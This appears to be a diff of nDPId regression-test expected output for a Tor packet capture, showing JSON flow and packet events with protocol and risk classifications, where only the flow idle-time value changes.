{"version":"TLSv1","client_requested_server_name":"www.t3i3ru.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.wohgpas45j6ucw.com","subjectDN":"CN=www.7d43ah2kikrabj.net","fingerprint":"F9:1D:5F:89:8F:D8:58:1E:45:E7:9B:A6:FD:90:95:77:FF:DD:E8:1B"}} 
+01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1852,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822129897,"flow_last_seen":1383822130047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":748,"flow_tot_l4_payload_len":961,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1383822130047,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.gfu7hbxpfp.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.xkgk7fdx362yyyxib.com","subjectDN":"CN=www.g6ghvisevf3ibuu5.net","fingerprint":"94:F9:FF:E2:7F:DB:1F:B8:19:65:20:6F:F6:DE:B6:A5:D5:AF:14:C7"}} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1862,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822130216} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1862,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822130168,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 
-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1888,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822130889,"flow_last_seen":1383822130889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383822130889,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1888,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1383822130889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822130889,"pkt":"UlQA2EYhUlQAWul3CABFAAA0CK1AAIAGwljAqAH8JuVGNcfoAbv0twffAAAAAIACIABZFwAAAgQFtAEDAwgBAQQC"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1891,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1383822131033,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822131033,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADQGFwYm5UY1wKgB\/AG7x+hg0\/cE9LcH4IASOQjoIwAAAgQFtAEBBAIBAwMK"} -00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1892,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1383822131034,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383822131034,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCK9AAIAGwmLAqAH8JuVGNcfoAbv0twfgYNP3BVAQAQBhAQAAAAAAAAAA"} 
-00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1893,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822130889,"flow_last_seen":1383822131034,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1383822131034,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.jmts2id.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01151{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1896,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822130889,"flow_last_seen":1383822131220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":929,"flow_tot_l4_payload_len":1139,"flow_avg_l4_payload_len":189,"midstream":0,"thread_ts_msec":1383822131220,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1","client_requested_server_name":"www.jmts2id.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"e1691a31bfe345d2692da75636ddfb00","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"CN=www.gg562izcxdvqdk.com","subjectDN":"CN=www.fcsyvnlemwxv5p.net","fingerprint":"C1:93:18:2C:A3:1D:AC:5F:C7:DE:17:8A:4E:B1:E8:13:BB:08:73:3A"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1888,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822130889,"flow_last_seen":1383822130889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383822130889,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1888,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1383822130889,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822130889,"pkt":"UlQA2EYhUlQAWul3CABFAAA0CK1AAIAGwljAqAH8JuVGNcfoAbv0twffAAAAAIACIABZFwAAAgQFtAEDAwgBAQQC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1891,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1383822131033,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822131033,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADQGFwYm5UY1wKgB\/AG7x+hg0\/cE9LcH4IASOQjoIwAAAgQFtAEBBAIBAwMK"} 
+00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1892,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1383822131034,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383822131034,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCK9AAIAGwmLAqAH8JuVGNcfoAbv0twfgYNP3BVAQAQBhAQAAAAAAAAAA"} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1893,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822130889,"flow_last_seen":1383822131034,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1383822131034,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.jmts2id.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01151{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1896,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822130889,"flow_last_seen":1383822131220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":929,"flow_tot_l4_payload_len":1139,"flow_avg_l4_payload_len":189,"midstream":0,"thread_ts_msec":1383822131220,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.jmts2id.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"e1691a31bfe345d2692da75636ddfb00","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"CN=www.gg562izcxdvqdk.com","subjectDN":"CN=www.fcsyvnlemwxv5p.net","fingerprint":"C1:93:18:2C:A3:1D:AC:5F:C7:DE:17:8A:4E:B1:E8:13:BB:08:73:3A"}} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1919,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822132212} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1919,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822132203,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} -00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":141,"flow_first_seen":1383821665420,"flow_last_seen":1383821774457,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":60720,"flow_avg_l4_payload_len":430,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":141,"flow_first_seen":1383821665420,"flow_last_seen":1383821774457,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":60720,"flow_avg_l4_payload_len":430,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1383821693159,"flow_last_seen":1383821693159,"flow_idle_time":180000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 
-00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821734359,"flow_last_seen":1383821734359,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"157.56.30.46","src_port":51104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}} -00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821734359,"flow_last_seen":1383821734359,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"157.56.30.46","src_port":51104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01047{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1383821666407,"flow_last_seen":1383821774461,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9246,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA 
Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}} -01053{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1576,"flow_first_seen":1383821668403,"flow_last_seen":1383821774532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1301150,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821734359,"flow_last_seen":1383821734359,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"157.56.30.46","src_port":51104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}} 
+00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821734359,"flow_last_seen":1383821734359,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"157.56.30.46","src_port":51104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01047{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1383821666407,"flow_last_seen":1383821774461,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9246,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}} 
+01053{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1576,"flow_first_seen":1383821668403,"flow_last_seen":1383821774532,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1301150,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}} 00683{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1383821673254,"flow_last_seen":1383822123915,"flow_idle_time":180000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":720,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1937,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822134212} 
00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1937,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822133931,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 
@@ -249,12 +249,12 @@ 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2070,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822184001,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2071,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822190212} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2071,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822184001,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2072,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822190886,"flow_last_seen":1383822190886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383822190886,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2072,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1383822190886,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822190886,"pkt":"UlQA2EYhUlQAWul3CABFAAA0COtAAIAGZnzAqAH8PtKJ5sfxAbspsDzeAAAAAIACIACTeAAAAgQFtAEDAwgBAQQC"} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2073,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1383822190950,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822190950,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADEGvmc+0onmwKgB\/AG7x\/Gvhi1nKbA834ASOQidcgAAAgQFtAEBBAIBAwMH"} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2074,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1383822190951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383822190951,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCOxAAIAGZofAqAH8PtKJ5sfxAbspsDzfr4YtaFAQAQAWTQAAAAAAAAAA"} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2075,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822190886,"flow_last_seen":1383822190951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1383822190951,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.6gyip7tqim7sieb.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01159{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2077,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822190886,"flow_last_seen":1383822191037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":740,"flow_tot_l4_payload_len":958,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1383822191037,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.6gyip7tqim7sieb.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.a3uycdf3rn5md.com","subjectDN":"CN=www.l7xvysfnvkb.net","fingerprint":"EE:86:E7:21:36:93:23:30:DB:A0:09:48:55:16:CB:A8:E9:DA:01:D0"}} 